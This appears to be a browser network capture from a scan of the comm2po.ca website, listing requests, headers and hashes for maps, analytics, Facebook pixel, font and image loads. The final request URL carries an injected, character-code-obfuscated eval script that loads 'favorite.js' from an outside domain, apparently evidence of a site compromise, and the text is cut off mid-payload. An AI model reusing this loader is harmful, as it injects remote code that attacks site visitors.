User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/en/
Cookie: _tccl_visitor=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _tccl_visit=c98f5607-7ab0-5908-8a69-e7b3cf79c738; _icl_current_language=fr; _icl_visitor_lang_js=en-us; _ga=GA1.2.1089217015.1663734221; _gid=GA1.2.317090227.1663734221; _gat=1; _gat_gtag_UA_43911422_1=1
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Mon, 03 May 2021 17:10:56 GMT
etag: "1580dd1-58bd9-5c1700b70e800"
accept-ranges: bytes
content-length: 363481
content-type: image/png
date: Wed, 21 Sep 2022 04:23:41 GMT
server: Apache
X-Firefox-Spdy: h2
maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
142.250.74.170200 OK 23 B URL HTTP/2 maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
IP 142.250.74.170:0
File type JSON data\012- , ASCII text
Hash e3981ca10169a319d5aa062bf43a5fa1
2c6ed584767b65688ce99b1ebe1a3b7448a67421
8b0b8749aba12de93f3cf5d86f9fac9d6de7cac400a17473718f182a34ebb7e9
GET /maps/api/mapsjs/gen_204?csp_test=true HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/json; charset=UTF-8
vary: Origin, X-Origin, Referer
content-encoding: gzip
date: Wed, 21 Sep 2022 04:23:42 GMT
server: scaffolding on HTTPServer2
cache-control: private
content-length: 23
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
access-control-allow-origin: https://www.comm2po.ca
access-control-expose-headers: vary,vary,vary,content-encoding,date,server,content-length
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash bb4bdc4c3c6869c822618f0b9ef1bdc5
6a438b8d9d87aa30e0989ace7fc0d4cafce1f29d
eb762661b0a0ecc4ccdf50229ce134d0062e8d60698b7ed1970c5073b18f31ac
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:42 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img.youtube.com/vi/GkX0bwjE7pk/maxresdefault.jpg
142.250.74.142200 OK 92 kB URL HTTP/2 img.youtube.com/vi/GkX0bwjE7pk/maxresdefault.jpg
IP 142.250.74.142:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x720, components 3\012- data
Hash c7ece595beec760ca55923774c3cb05b
5d81e4dc82d4b7f7a8f0c60d64b590d33e05139d
f9560074caa3fbd7298e9181237b56d3eacbffaaaa82d2f7e76c1a17fa221705
GET /vi/GkX0bwjE7pk/maxresdefault.jpg HTTP/1.1
Host: img.youtube.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
content-type: image/jpeg
vary: Origin
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy-report-only: same-origin; report-to="youtube"
report-to: {"group":"youtube","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube"}]}
timing-allow-origin: *
content-length: 92424
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 06:23:42 GMT
cache-control: public, max-age=7200
etag: "1552324497"
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
157.240.200.35200 OK 44 B URL HTTP/2 www.facebook.com/tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
IP 157.240.200.35:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash b798f4ce7359fd815df4bdf76503b295
f8cc6addf1707ad236ad9970b0a48f9733d07da5
10d8d42d73a02ddb877101e72fbfa15a0ec820224d97cedee4cf92d571be5caa
GET /tr/?id=294823864328140&ev=PageView&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222404&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=0&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 04:23:42 GMT
last-modified: Fri, 21 Dec 2012 00:00:01 GMT
cache-control: no-cache, must-revalidate, max-age=0
set-cookie:
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 44
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
www.facebook.com/tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
157.240.200.35200 OK 44 B URL HTTP/2 www.facebook.com/tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET
IP 157.240.200.35:0
File type GIF image data, version 89a, 1 x 1\012- data
Hash b798f4ce7359fd815df4bdf76503b295
f8cc6addf1707ad236ad9970b0a48f9733d07da5
10d8d42d73a02ddb877101e72fbfa15a0ec820224d97cedee4cf92d571be5caa
GET /tr/?id=294823864328140&ev=GeneralEvent&dl=https%3A%2F%2Fwww.comm2po.ca%2Fen%2F&rl=https%3A%2F%2Fwww.comm2po.ca%2F&if=false&ts=1663734222408&cd[post_type]=page&cd[post_id]=5395&cd[content_name]=Home&cd[domain]=www.comm2po.ca&cd[user_roles]=guest&cd[plugin]=PixelYourSite&sw=1280&sh=1024&v=2.9.83&r=stable&a=dvpixelyoursite&ec=1&o=30&fbp=fb.1.1663734222403.158646599&it=1663734222289&coo=false&rqm=GET HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
date: Wed, 21 Sep 2022 04:23:42 GMT
expires: Wed, 21 Sep 2022 04:23:42 GMT
last-modified: Fri, 21 Dec 2012 00:00:01 GMT
cache-control: no-cache, must-revalidate, max-age=0
set-cookie:
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
content-length: 44
server: proxygen-bolt
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2
app.leadfox.co/service/api/rest/
172.67.71.4200 OK 54 kB URL HTTP/2 app.leadfox.co/service/api/rest/
IP 172.67.71.4:0
File type JSON data\012- , ASCII text, with no line terminators
Hash d838d6598ca6722dc2a3070a681da215
b9f3c56318bd641a155e8366cb8fb536fdf2d9ba
adb994b35b57e6d4e104219274af8e04cd4db0aa9b66703fa0cd2b366f8fd536
GET /service/api/rest/ HTTP/1.1
Host: app.leadfox.co
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Wed, 21 Sep 2022 04:23:42 GMT
content-type: application/json
access-control-allow-origin: https://www.comm2po.ca
x-kong-upstream-latency: 2
x-kong-proxy-latency: 0
via: kong/2.8.0
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LWpMNqIiGLqSWWQtqwoKM3C%2B0AId6%2BF6hsm3wSP1JaZmsZCpzdTfN3Pb8pvGvJFKqp6Rlhp9dP4rlz6%2B5P3UNdgNbk0hmw9k5ITlldJj1RrWVwQSLbEWWyDyFEdd%2FO1y"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 74e006ea9adcb4f7-OSL
content-encoding: br
X-Firefox-Spdy: h2
events.api.secureserver.net/t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview
104.84.152.58200 OK 43 B URL HTTP/2 events.api.secureserver.net/t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview
IP 104.84.152.58:0
ASN #20940 Akamai International B.V.
File type GIF image data, version 89a, 1 x 1\012- data
Hash 325472601571f31e1bf00674c368d335
2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a
b1442e85b03bdcaf66dc58c7abb98745dd2687d86350be9a298a1d9382ac849b
GET /t/1/tl/event?cts=1663734222120&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1375111975&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=6bd617ad-ba1d-5044-aa8e-6fc923ae182c&ht=pageview HTTP/1.1
Host: events.api.secureserver.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
content-length: 43
access-control-allow-origin: https://www.comm2po.ca
access-control-allow-credentials: true
x-robots-tag: noindex, nofollow
cache-control: private
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000 ; includeSubDomains
x-frame-options: DENY
date: Wed, 21 Sep 2022 04:23:42 GMT
X-Firefox-Spdy: h2
events.api.secureserver.net/t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard
104.84.152.58200 OK 43 B URL HTTP/2 events.api.secureserver.net/t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard
IP 104.84.152.58:0
ASN #20940 Akamai International B.V.
File type GIF image data, version 89a, 1 x 1\012- data
Hash 325472601571f31e1bf00674c368d335
2daeaa8b5f19f0bc209d976c02bd6acb51b00b0a
b1442e85b03bdcaf66dc58c7abb98745dd2687d86350be9a298a1d9382ac849b
GET /t/1/tl/event?cts=1663734222714&dh=www.comm2po.ca&dr=https%3A%2F%2Fwww.comm2po.ca%2F&ua=Mozilla%2F5.0%20(X11%3B%20Linux%20x86_64%3B%20rv%3A96.0)%20Gecko%2F20100101%20Firefox%2F96.0&vci=879917336&cv=2.0.0&z=1002697889&vg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&vtg=c98f5607-7ab0-5908-8a69-e7b3cf79c738&dp=%2Fen&ap=cpbh-mt&trfd=%7B%22ap%22%3A%22cpbh-mt%22%2C%22server%22%3A%22p3plmcpnl487996%22%2C%22id%22%3A%222016423%22%7D&hit_id=4aba5dcd-0f0e-5b7c-8b66-ff777e324948&ht=perf&tce=1663734221360&tcs=1663734221360&tdc=1663734222694&tdclee=1663734222232&tdcles=1663734222136&tdi=1663734222121&tdl=1663734221653&tdle=1663734221360&tdls=1663734221360&tfs=1663734221360&tns=1663734221360&trqs=1663734221376&tre=1663734221547&trps=1663734221546&tles=1663734222695&tlee=0&nt=navigate&nav_type=hard HTTP/1.1
Host: events.api.secureserver.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://www.comm2po.ca
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: image/gif
content-length: 43
access-control-allow-origin: https://www.comm2po.ca
access-control-allow-credentials: true
x-robots-tag: noindex, nofollow
cache-control: private
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000 ; includeSubDomains
x-frame-options: DENY
date: Wed, 21 Sep 2022 04:23:42 GMT
X-Firefox-Spdy: h2
fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
142.250.74.163200 OK 15 kB URL HTTP/2 fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
IP 142.250.74.163:0
File type Web Open Font Format (Version 2), TrueType, length 15344, version 1.0\012- data
Hash 5d4aeb4e5f5ef754e307d7ffaef688bd
06db651cdf354c64a7383ea9c77024ef4fb4cef8
3e253b66056519aa065b00a453bac37ac5ed8f3e6fe7b542e93a9dcdcc11d0bc
GET /s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://www.youtube-nocookie.com
Connection: keep-alive
Referer: https://www.youtube-nocookie.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 15344
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Sat, 17 Sep 2022 12:31:58 GMT
expires: Sun, 17 Sep 2023 12:31:58 GMT
cache-control: public, max-age=31536000
age: 316305
last-modified: Mon, 16 Oct 2017 17:32:55 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 99 kB URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059